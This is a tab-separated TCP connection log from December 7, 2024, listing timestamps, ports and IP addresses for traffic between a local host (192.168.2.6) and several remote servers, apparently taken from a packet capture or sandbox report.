Dec 7, 2024 10:51:22.640846968 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.640846968 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.640860081 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.640898943 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.642993927 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.643014908 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.643075943 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.643084049 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.643138885 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.643151045 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.648144960 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.648166895 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.648240089 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.648246050 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.648292065 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.648328066 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.649770021 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.649786949 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.649887085 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.649894953 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.649980068 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.655838013 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.655875921 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.655915976 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.655931950 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.655961037 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.655980110 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.656027079 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.656027079 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.656027079 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.656037092 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.656069040 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.656091928 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.659110069 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.659194946 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.659204960 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.659250021 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.663666010 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.663700104 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.663769960 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.663775921 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.663805962 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.663825035 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.671325922 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.671359062 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.671405077 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.671411991 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.671513081 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.672665119 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.672751904 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.672758102 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.672771931 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.672832966 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.703933001 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.703958988 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.708414078 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.708430052 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.709376097 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.709383965 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.906181097 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:22.906241894 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:23.115601063 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.115653992 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.116029978 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.116130114 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.116174936 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.138173103 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.138197899 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.138197899 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.138228893 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.138829947 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.138837099 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.139035940 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.139045000 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.139097929 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.139103889 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.139491081 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.139496088 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.139554024 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.139574051 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.139734983 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.139775991 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.140038967 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.140048981 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.140178919 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.140191078 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.147229910 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.147294998 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.147336006 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.147352934 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.147363901 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.147562027 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.147567987 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.164696932 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.164920092 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.164927959 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.174144983 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.174192905 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.174201012 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.178241014 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.178402901 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.178525925 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.179116011 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.179172993 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.179212093 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.179222107 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.179233074 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.179282904 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.179290056 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.179675102 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.179692030 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.184997082 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.185066938 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.185076952 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.191991091 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.192032099 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.192080975 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.192091942 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.192131042 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.193321943 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.193432093 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.193551064 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.193566084 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.198360920 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.210257053 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.210324049 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.210338116 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.261295080 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.261315107 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.309390068 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.309400082 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.331846952 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.331965923 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.333136082 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.333143950 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.333791971 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.333797932 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.356268883 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.393991947 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.400907040 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.400979042 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.400990963 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.409168959 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.409245968 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.409255028 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.417224884 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.417282104 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.417290926 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.429078102 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.429125071 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.429133892 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.450249910 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.450309038 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.450318098 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.473680019 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.473737955 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.473748922 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.480103016 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.480170965 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.480180025 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.488193035 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.488241911 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.488250971 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.497457981 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.497592926 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.497601032 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.509928942 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.509974957 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.510075092 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.510734081 CET	49740	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.510747910 CET	443	49740	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.513991117 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.514024019 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.514069080 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.514080048 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.514130116 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.517997026 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.550924063 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.550945044 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.550997972 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.551063061 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.551063061 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.552241087 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.552272081 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.552285910 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.552294016 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.554729939 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.554750919 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.554804087 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.554819107 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555140018 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555155993 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555211067 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555221081 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555252075 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555319071 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555382967 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555432081 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555486917 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555574894 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555717945 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555717945 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555747032 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555761099 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.555999041 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.555999041 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.556010962 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.556020021 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.556051970 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.556087017 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.556168079 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.556216955 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.556231022 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.556241035 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.556246042 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.557941914 CET	49741	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.557964087 CET	443	49741	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.559075117 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.559082985 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.560358047 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.560374975 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.560388088 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.560410023 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.560492039 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.560589075 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.561009884 CET	49743	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.561039925 CET	443	49743	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.561810970 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.561840057 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.562069893 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.562644005 CET	49742	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.562659025 CET	443	49742	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.562725067 CET	49744	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.562748909 CET	443	49744	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.586417913 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.588546038 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.588562012 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.591622114 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.591689110 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.591698885 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.599606037 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.599728107 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.599852085 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.600545883 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.600550890 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.600564957 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.600569963 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.601937056 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.602018118 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.602025986 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.603792906 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.603821039 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.603988886 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.604595900 CET	49745	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:23.604615927 CET	443	49745	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:23.615108967 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.615175962 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.615185022 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.626993895 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.627219915 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.627228022 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.638528109 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.638596058 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.638611078 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.649508953 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.649720907 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.649729967 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.661138058 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.661201954 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.661211014 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.672739983 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.672785997 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.672794104 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.684216976 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.684290886 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.684298992 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.695656061 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.695714951 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.695724964 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.707128048 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.707175016 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.707185030 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.716629028 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.716675043 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.716682911 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.725538969 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.725586891 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.725594997 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.734448910 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.734499931 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.734507084 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.743233919 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.743283033 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.743290901 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.751959085 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.752142906 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.752151966 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.760853052 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.760899067 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.760910988 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.769738913 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.769788980 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.769795895 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.778139114 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.778237104 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.778244972 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.785150051 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.785207987 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.785216093 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.792591095 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.792651892 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.792660952 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.797472954 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.797542095 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.797549963 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.803675890 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.803752899 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.803761959 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.809988976 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.810046911 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.810055017 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.816222906 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.816272020 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.816281080 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.822834015 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.822882891 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.822891951 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.824718952 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.824744940 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.824759960 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.824778080 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.824790001 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:23.824819088 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.824853897 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:23.829176903 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.829231977 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.829240084 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.835289955 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:23.835349083 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:23.835356951 CET	443	49724	142.250.181.68	192.168.2.6
